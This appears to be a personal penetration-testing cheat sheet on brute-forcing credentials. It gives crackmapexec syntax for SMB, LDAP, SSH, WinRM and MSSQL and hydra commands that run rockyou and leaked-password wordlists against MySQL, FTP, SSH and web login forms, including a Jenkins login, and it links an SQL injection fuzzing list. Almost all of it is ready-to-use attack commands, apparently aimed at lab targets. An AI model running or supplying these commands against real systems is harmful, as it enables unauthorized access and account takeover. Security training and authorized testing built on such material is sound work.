#
bruteforceing creds
#
crackmapexec
crackmapexec examples
crackmapexec <protocol> <target(s)> -u username -p password # generic example
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2 # multiple passwords
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1 # multiple usernames
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwordsavailable protocols {ldap,smb,ssh,winrm,mssql}
ldap own stuff using ldap
smb own stuff using SMB
ssh own stuff using SSH
winrm own stuff using WINRM
mssql own stuff using MSSQL
#
hydra
#
hydra Examples
hydra -L users.list -P /usr/share/wordlists/rockyou.txt example.box mysql # Bruteforce mysql a list of users
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ftp # Bruteforce ftp for user mike using 4 threads
hydra -t 4 -l john -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-60.txt 10.10.10.10 ssh # Bruteforce ssh for user john using 4 threads
#
hydra web forms
sudo hydra <Username/List> <Password/List> <IP> <Method> "<Path>:<RequestBody>:<IncorrectVerbiage>"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login.php:username=admin&password=^PASS^:Invalid username"
# on another port (in this case jenkins on port 8080)
hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-60.txt 10.10.10.10 -s 8080 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^:Invalid username"
#
SQL injection
SQLi list for fuzzing with burpsuite intruder: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/xplatform.txt